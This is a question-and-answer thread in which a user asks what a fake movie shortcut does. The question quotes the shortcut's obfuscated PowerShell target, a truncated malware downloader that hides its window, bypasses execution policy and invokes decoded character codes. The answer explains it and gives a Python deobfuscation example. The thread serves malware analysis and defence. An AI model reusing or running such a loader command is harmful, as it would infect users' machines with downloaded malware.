
In Windows 10 I downloaded this file that I thought was a movie, but it was a shortcut with a size of 700 MB.

I see that the target is this

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116

And it was set to start at

%SYSTEMROOT%\System32\WindowsPowerShell\v1.0

What does it do?

Erik

1 Answer


It's a malware loader.

It executes PowerShell code beginning with New-Object System.N... (hidden in the numbers), which in full is New-Object System.Net.WebClient, that will further be used to download and execute the actual malware from the URL that is also hidden in the further numbers of the obfuscated code.

If you have already clicked the link, then you're likely already infected, unless the URL was already taken down.

You may try to paste your line into Notepad and then delete everything before ( -JoiN( (, copy the remaining part (beginning with ( -JoiN( (...) and paste it into a PowerShell window. It will disclose the obfuscated PowerShell code that would normally be executed by the preceding $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.
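The same string can be recovered statically, without handing anything to PowerShell: the numbers are character codes (octal here), and the $PSHOME indexing only spells out "ieX". This is an added Python example, not code from the question or the answer; it assumes the default $PSHOME path and uses the truncated fragment quoted in the question as its input.

```python
import re

# Fragment of the shortcut target exactly as quoted in the question (it is truncated there too).
TARGET = (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP "
          r". ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , "
          r"145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116")

# Assumed default $PSHOME on Windows 10; it matches the "start in" folder from the question.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"


def resolve_pshome_alias(expr, pshome=PSHOME):
    """Turn $PSHOME[n] + 'literal' pieces (case-insensitive, like PowerShell) into the text they build."""
    parts = []
    for idx, lit in re.findall(r"\$pshome\[(\d+)\]|'([^']*)'", expr, flags=re.IGNORECASE):
        parts.append(pshome[int(idx)] if idx else lit)
    return "".join(parts)


def extract_numbers(target):
    """Pull the numeric list that follows -JoiN( ( out of the command line."""
    m = re.search(r"-join\s*\(\s*\(\s*([\d\s,]+)", target, flags=re.IGNORECASE)
    if not m:
        raise ValueError("no -Join( ( number list found")
    return [int(n) for n in re.findall(r"\d+", m.group(1))]


def decode(numbers, base):
    """Read every number as a character code written in the given base."""
    return "".join(chr(int(str(n), base)) for n in numbers)


def deobfuscate(target):
    """Return the first readable decoding of the number list; nothing is executed."""
    nums = extract_numbers(target)
    for base in (8, 10):          # try octal first, then plain decimal
        try:
            text = decode(nums, base)
        except ValueError:        # a digit 8 or 9 rules out octal
            continue
        if text.isascii() and text.isprintable():
            return text
    raise ValueError("no printable decoding found")


if __name__ == "__main__":
    print(resolve_pshome_alias("$pshOmE[4]+$PShoMe[30]+'X'"))  # ieX
    print(deobfuscate(TARGET))                                  # $aspx = ((New-Object System.N
```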